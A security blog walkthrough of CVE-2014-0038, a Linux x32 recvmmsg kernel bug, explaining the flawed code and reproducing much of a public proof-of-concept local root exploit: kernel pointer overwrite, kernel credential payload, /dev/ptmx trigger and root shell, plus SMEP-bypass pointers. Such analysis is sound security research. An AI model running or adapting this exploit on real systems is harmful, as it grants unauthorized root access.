How to exploit the x32 recvmmsg() kernel vulnerability CVE 2014-0038

http://blog.includesecurity.com/2014/03/exploit-CVE-2014-0038-x32-recvmmsg-kernel-vulnerablity.html

On January 31st 2014 a post appeared on oss-seclist [1] describing a bug in the Linux kernel implementation of the x32 recvmmsg syscall that could potentially lead to privilege escalation. It didn't take long until the first exploits appeared, in this blog post we'll walk-through the vulnerability and Samuel's Proof-of-concept exploit in detail.

The Vulnerable Linux Kernel Code

The bug is located in the x32 version of the recvmmsg syscall in the Linux kernel. The recvmmsg syscall allows for receiving multiple messages on a socket with just one syscall (and can thus increase performance in certain situations).

To be clear the x32 ABI (not to be confused with the X86 ABI) is a particular ABI and that is not enabled by default on all distributions. However, recent Ubuntu-based distributions as well as Arch Linux ones have enabled it. For more details on the x32 ABI refer to [2]. In short x32 is an ABI which takes advantage of the 64-bit environment while using 32bit pointers for less overhead. However, the x32 system calls can also be accessed by standard 64bit applications by setting adding the value of __X32_SYSCALL_BIT to 64bit system call numbers.

The CVE 2014-0038 bug is a fairly classic case of trusting user supplied input. The timeout pointer in the function below is passed directly from user space to __sys_recvmmsg, which expects a trusted pointer, without first copying the value of the user supplied pointer to a controlled kernel space variable.
The following is the code which handles the recvmmsg syscall for the x32 ABI (net/compat.c):

asmlinkage long compat_sys_recvmmsg(int fd, struct compat_mmsghdr __user *mmsg,
                                    unsigned int vlen, unsigned int flags,
                                    struct compat_timespec __user *timeout)
{
        int datagrams;
        struct timespec ktspec;

        if (flags & MSG_CMSG_COMPAT)
                return -EINVAL;

        if (COMPAT_USE_64BIT_TIME)      /* set when doing the x32 syscall, the x32 ABI uses 64bit time values */
                return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
                                      flags | MSG_CMSG_COMPAT,
                                      (struct timespec *) timeout);
/* ... */

Pointers passed from user space are marked with the __user attribute to make sure they are only accessed through the user space API functions (e.g. copy_to_user, copy_from_user, ...). In this case though, the timeout parameter is cast directly to a type not containing the __user attribute, and then passed on to __sys_recvmmsg without any further checks on it.
Compare this to what the normal x86_64 syscall does:

SYSCALL_DEFINE5(recvmmsg, int, fd, struct mmsghdr __user *, mmsg,
          unsigned int, vlen, unsigned int, flags,
          struct timespec __user *, timeout)
  {
      int datagrams;
      struct timespec timeout_sys;
      if (flags & MSG_CMSG_COMPAT)
          return -EINVAL;
      if (!timeout)
          return __sys_recvmmsg(fd, mmsg, vlen, flags, NULL);
/* -1- */
      if (copy_from_user(&timeout_sys, timeout, sizeof(timeout_sys)))
          return -EFAULT;
      datagrams = __sys_recvmmsg(fd, mmsg, vlen, flags, &timeout_sys);
      if (datagrams > 0 &&
          copy_to_user(timeout, &timeout_sys, sizeof(timeout_sys)))
          datagrams = -EFAULT;
      return datagrams;
  }

At -1- the timeout struct is copied into a kernel space variable before passing it to __sys_recvmmsg. That's the correct way to do it.

Digging Deeper Into the Vulnerability

First things first: the timespec structure, defined in include/uapi/linux/time.h:

struct timespec {
    long tv_sec;   /* seconds */
    long tv_nsec;  /* nanoseconds */
};

Now let's take a closer look at what happens to the timeout pointer passed from user space.
From compat_sys_recvmmsg the pointer is passed to __sys_recvmmsg, located in net/socket.c:

int __sys_recvmmsg(int fd, struct mmsghdr __user *mmsg, unsigned int vlen,
           unsigned int flags, struct timespec *timeout)
{
    if (timeout &&                                      /* -1- */
        poll_select_set_timeout(&end_time, timeout->tv_sec,
                    timeout->tv_nsec))
        return -EINVAL;
    /* ... */
    while (datagrams < vlen) {              /* -2- */
        /*
         * Basically just a loop calling recvmsg
         * until the timeout is hit or vlen messages have
         * been received.
         */
        if (MSG_CMSG_COMPAT & flags) {
            err = ___sys_recvmsg(sock, (struct msghdr __user *)compat_entry,
                         &msg_sys, flags & ~MSG_WAITFORONE,
                         datagrams);
            /* ... */
        } else {
            err = ___sys_recvmsg(sock,
                         (struct msghdr __user *)entry,
                         &msg_sys, flags & ~MSG_WAITFORONE,
                         datagrams);
            /* ... */
        }
        /* ... */
        if (timeout) {
            ktime_get_ts(timeout);          // put current time into *timeout
                                            // then subtract that from end_time
            *timeout = timespec_sub(end_time, *timeout);        /* -3- */
            if (timeout->tv_sec < 0) {                        
                timeout->tv_sec = timeout->tv_nsec = 0;         /* -4- */
                break;
            }
            /* Timeout, return less than vlen datagrams */
            if (timeout->tv_nsec == 0 && timeout->tv_sec == 0)
                break;
        }
    /* ... */

The first thing to note here is the block at -1-. Here poll_select_set_timeout will set end_time to the time when the timeout will be over. More importantly, it will check whether timeout points to a valid timespec struct. If it does not then it will return -EINVAL and thus cause the syscall to fail.
Here is the function performing the check (include/linux/time.h):

static inline bool timespec_valid(const struct timespec *ts)
{
    /* Dates before 1970 are bogus */
    if (ts->tv_sec < 0)                                 /* -5- */
        return false;
    /* Can't have more nanoseconds then a second */
    if ((unsigned long)ts->tv_nsec >= NSEC_PER_SEC)     /* -6- */   // include/linux/time.h: #define NSEC_PER_SEC 1000000000L
        return false;
    return true;
}

At -5- the first long, tv_sec, is checked to be a positive number, meaning it's most significant byte must be smaller than 0x8, and at -6- the tv_nsec member is checked to be smaller than 1,000,000,000 (= 1 second), so tv_nsec must be between 0 and 0x000000003b9aca00. Keep this in mind as we move on.
Next the code enters the loop at -2-, waiting for incoming packets. After a packet has been received by __sys_recvmsg the timeout struct is updated to contain the time left (-3-).

If that value is < 0, both tv_sec and tv_nsec are set to zero at -4- and the function returns.
The loop will thus exit if either vlen messages have been received or the timeout is hit after receiving a packet. Do note the call will only return after a packet has been received, even if the timeout has already been hit. By sending packets to ourselves from a forked child, we can enter the code that updates the timeout at any time. And by setting vlen to 1, we can guarantee that timeout is only written to once.

The Exploitation vector

So what can we do with this situation from an exploitation perspective?

The basic idea that comes to mind is pointing the timeout pointer to sensitive kernel data with known content and waiting a specific amount of time until sending a UDP packet (thus reaching the block at -3- in the code above). This will cause the function to update the timeout structure and return.

In other words we will make the kernel treat some of its own memory (preferably a function pointer) as the timeout argument and thus cause the kernel to overwrite part of its own memory. This allows us to write a nearly arbitrary value to an address of our choosing (we have 64bit pointers so we can address the whole address space), as long as the original value is known and there is a valid timespec struct at that address.

Since kernel pointers always have the high 4 bytes set to 0xff they make a good target.
Imagine the following situation:

pointer: 0xffffffff44434241               uninitialized data
     (little endian)
+-------------------------+-------------------------+-------------------------+
| 41 42 43 44 ff ff ff ff | 00 00 00 00 00 00 00 00 | 00 00 00 00 00 00 00 00 |
+-------------------------+-------------------------+-------------------------+
                       ^ point timeout here
                       [-------- tv_sec -------] [------- tv_nsec -------]

If the address of the last (most significant) byte of the pointer is passed as a timeout, waiting >= 255 seconds will clear that byte without mangling up adjacent data as the whole block is set to zero. Repeating this for the next two bytes will allow us to point that pointer into user space (this is what the original version of the exploit did).

To speed things up the bytes can be cleared in parallel. For this to work the time between the syscall and the incoming packet must be > 254s and < 255s. This will cause the recvmmsg function to write garbage to the following two longs, as they are treated as tv_nsec value and will then contain the remaining nanoseconds of the timeout.

A Walk-through of the Proof-of-concept Exploit

Now let's start with a brief overview on the steps the exploit takes to get root privileges.
The exploit follows the common scheme of tricking the kernel into executing code in user space memory. This has quite a few advantages, including being able to write the payload in nicely readable C code. For a more detailed discussion of this technique refer to [3].

Here are the basic steps:

Allocate executable and writable memory at the address to which the kernel will jump, and copy the kernel payload at the end of that region.

Target the release function pointer of the ptmx_fops structure located in the .data section which is writable kernel memory. Zero out the three most significant bytes, thereby turning it into a pointer inside of the region mapped by user space.

Open /dev/ptmx and close it, causing ptmx_fops->release() to be called.

Check if root privileges were obtained and start a shell.

Let's examine each of those steps in more detail.

Resolving symbols

The exploit needs four kernel symbols to be resolved, those are

#define PTMX_FOPS           0xffffffff81fb30c0LL
#define TTY_RELEASE         0xffffffff8142fec0LL
#define COMMIT_CREDS        0xffffffff8108ad40LL
#define PREPARE_KERNEL_CRED 0xffffffff8108b010LL

They can be taken from /boot/System.map or the decompressed kernel image via nm.
The PoC linked at the end of this post also contains a script (build.sh) which will help resolving with the symbols. The README in the PoC provides details on how to use it.

Setting things up

/* Prepare payload... */
printf("preparing payload buffer...
");
code = (long)mmap((void*)(TTY_RELEASE & 0x000000fffffff000LL), PAYLOADSIZE, 7, 0x32, 0, 0);
memset((void*)code, 0x90, PAYLOADSIZE);
code += PAYLOADSIZE - 1024;
memcpy((void*)code, &kernel_payload, 1024);

The first thing the exploit does is allocate executable and writable memory at a fixed address. TTY_RELEASE is the original value of the targeted pointer in kernel space. Since the three most significant bytes of that pointer will be cleared, a mask of 0x000000fffffff000 has to be applied to it.
The memory region is then filled with nops and the kernel payload (discussed later) is copied into it.

The target

/*
 * Now clear the three most significant bytes of the fops pointer
 * to the release function.
 * This will make it point into the memory region mapped above.
 */
printf("changing kernel pointer to point into controlled buffer...
");
target = PTMX_FOPS + FOPS_RELEASE_OFFSET;
for (i = 0; i < 3; i++) {
    pids[i] = fork();
    if (pids[i] == 0) {
        zero_out(target + (5 + i));
        exit(EXIT_SUCCESS);
    }
    sleep(1);
}

The pointer targeted in the exploit is the release function pointer of the ptmx_fops structure, which originally points to tty_release. In the Linux kernel the file_operations structure contains a bunch of function pointers to be executed when user space accesses the associated file. Examples include open, release, write, ... ptmx_fops->release is called when the last reference to that file descriptor is released. The two pointers following release are not initialized (= 0) and will thus be valid tv_nsec values. The situation is then similar to the one depicted in the diagram shown in the "Exploitation Vector" section. User space can map 0x000000ffxxxxxxxx, meaning only 3 of the 4 high order bytes of the pointer need to be cleared. To speed things up three additional processes are forked, each one clearing a byte of the pointer. (Note: The sleep(1) between each fork is done here to guarantee a different seed for srand() in each child. This is needed so every child opens a different UDP port.)

Exploiting the bug

void zero_out(long addr)
{
    int sockfd, retval, port, pid, i;
    struct sockaddr_in sa;
    char buf[BUFSIZE];
    struct mmsghdr msgs;
    struct iovec iovecs;
    srand(time(NULL));
    port = 1024 + (rand() % (0x10000 - 1024));
    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd == -1) {
        perror("socket()");
        exit(EXIT_FAILURE);
    }
    sa.sin_family      = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port        = htons(port);
    if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
        perror("bind()");
        exit(EXIT_FAILURE);
    }
    memset(&msgs, 0, sizeof(msgs));
    iovecs.iov_base         = buf;
    iovecs.iov_len          = BUFSIZE;
    msgs.msg_hdr.msg_iov    = &iovecs;
    msgs.msg_hdr.msg_iovlen = 1;
    /*
     * start a separate process to send a UDP message after 255 seconds so the syscall returns,
     * but not after updating the timeout struct and writing the remaining time into it.
     * 0xff - 255 seconds = 0x00
     */
    printf("clearing byte at 0x%lx
", addr);
    pid = fork();
    if (pid == 0) {
        memset(buf, 0x41, BUFSIZE);
        if ((sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
            perror("socket()");
            exit(EXIT_FAILURE);
        }
        sa.sin_family      = AF_INET;
        sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
        sa.sin_port        = htons(port);
        sleep(0xfe);
        printf("waking up parent...
");
        sendto(sockfd, buf, BUFSIZE, 0, &sa, sizeof(sa));                           /* -1- */
        exit(EXIT_SUCCESS);
    } else if (pid > 0) {
        retval = syscall(__NR_recvmmsg, sockfd, &msgs, 1, 0, (void*)addr);          /* -2- */
        if (retval == -1) {
            printf("address can't be written to, not a valid timespec struct!
");
            exit(EXIT_FAILURE);
        }
        waitpid(pid, 0, 0);
        printf("byte zeroed out
");
    } else {
      perror("fork()");
      exit(EXIT_FAILURE);
    }
}

This is the key part of the exploit, we're abusing the bug as discussed in the "Exploitation Vector" section. After a lot of code to set up the structures needed for the syscall, the passed address is used as the least significant byte of the timeout pointer (-2-) and the vulnerable syscall is called.
At -2- the forked child process will wake its parent so the time difference between the syscall and the incoming packet is between 254 and 255 seconds, thus setting the least significant byte of the tv_sec member to 0.
Keep in mind that this function is executed by three child processes. The memory at the address of ptmx_fops->release roughly looks like this at the beginning:

     release pointer             uninitialized            uninitialized
+-------------------------+-------------------------+-------------------------+
| c0 fe 42 81 ff ff ff ff | 00 00 00 00 00 00 00 00 | 00 00 00 00 00 00 00 00 |
+-------------------------+-------------------------+-------------------------+
                       ^ address for child 3
                    ^ address for child 2
                 ^ address for child 1

Turning it into:

     release pointer               mangled                  mangled
+-------------------------+-------------------------+-------------------------+
| c0 fe 42 81 ff 00 00 00 | 00 00 00 00 00 xx xx xx | xx xx xx 00 00 00 00 00 |
+-------------------------+-------------------------+-------------------------+

ptmx_fops->release now points into the memory region that was mapped at the beginning.

Code execution in Ring 0

/* ... and trigger. */
printf("releasing file descriptor to call manipulated pointer in kernel mode...
");
pwn = open("/dev/ptmx", 'r');
close(pwn);

At this point we are ready to execute our payload in ring 0 by opening a file descriptor to /dev/ptmx and immediately closing it, causing the kernel to call ptmx_fops->release in the current context.
Now if all goes well (see restrictions further down) the kernel will jump to our code, change the creds structure of our process to a new one with root privileges (and all capabilities) and return to user mode.
Let's take a closer look at how that is done next.

Kernel payload

int __attribute__((regparm(3)))
kernel_payload(void* foo, void* bar)
{
    _commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
    _prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;
    /* restore function pointer and following two longs */
    *((int*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 4)) = -1;
    *((long*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 8)) = 0;
    *((long*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 16)) = 0;
    /* escalate to root */
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

This is the function copied into the end of the allocated buffer at the beginning. The kernel will execute this code during the close syscall and then return back to user space. The kernel payload uses an old approach which has been documented by Brad Spengler (Spender) in his enlightenment framework [4] (see exploit.c).

Basically, after restoring the manipulated memory region, a new cred structure with full privileges is allocated by prepare_kernel_cred and afterwards passed to commit_creds to install it upon the current task. Since the exploit needs to resolve the tty_release and ptmx_fops symbols anyways this approach was chosen.

It would also be possible to change the credentials without calling any helper functions in the kernel.
This can be done by looking for a pointer to the cred structure stored in the task_struct for the current process, which can in turn be found at the beginning of the kernel stack.
By searching for memory that contains the current process uid and gid and setting those to zero, root privileges can be acquired as well.
For an example demonstrating this technique refer to the semtex.c exploit [5].

Finishing

if (getuid() != 0) {
    printf("failed to get root :(
");
    exit(EXIT_FAILURE);
}
printf("got root, enjoy :)
");
return execl("/bin/bash", "-sh", NULL);

Some notes on reliability

Since the exploit relies on timing it might be unreliable if the exploited system is under very heavy load.
If the kernel fails to reschedule the child process to wake up its parent on time (meaning within a second) the pointer will get corrupted and the exploit will fail, causing a kernel Oops.
In this case a non-threaded exploit which clears the bytes sequentially can be used. You'd want to wait 255 seconds for each byte and this guarantees that the whole timespec structure will be zeroed out when waking up the parent. This approach takes 3 times longer as the parallel version though, so approximately 13 minutes [6]. I have tested the parallel version on a system under heavy load (100% CPU usage) multiple times and have not seen the exploit fail, so I assume this to be more of a theoretical issue (setting up the sockets and rescheduling a process within one second is really no big deal, even under stress).

The original non-threaded version of this exploit in theory works reliably vs. the threaded version, but does take a while to execute.

Exploit restrictions

Since the exploit tricks the kernel into executing user space pages it can be stopped by SMEP [7]. SMEP will cause the CPU to generate a fault if it is executing code from a user space page in kernel mode. Think of SMEP as kind of a DEP/NX for the kernel. To bypass SMEP the 20th bit of CR4 can be cleared through a ROP chain. Afterwards executing code in user space is possible. This technique is described in further detail in [8]. If no gadgets can be found for writing to the CR4 register exploitation would still be possible by writing the payload in ROP entirely.
Also see the post in [9].

That's it, find the full proof-of-concept exploit code at:
https://github.com/saelo/cve-2014-0038

If you have interesting optimizations or alternative implementations let us know via email info/atincludesecurity.com

References

[1] http://seclists.org/oss-sec/2014/q1/187
[2] http://en.wikipedia.org/wiki/x32_ABI
[3] http://www.phrack.org/issues.html?id=6&issue=64
[4] http://grsecurity.net/~spender/exploits/enlightenment.tgz
[5] http://packetstormsecurity.com/files/121616/semtex.c
[6] http://pastebin.com/DH3Lbg54
[7] http://en.wikipedia.org/wiki/Control_register#CR4
[8] http://blog.ptsecurity.com/2012/09/bypassing-intel-smep-on-windows-8-x64.html
[9] http://vulnfactory.org/blog/2011/06/05/smep-what-is-it-and-how-to-beat-it-on-linux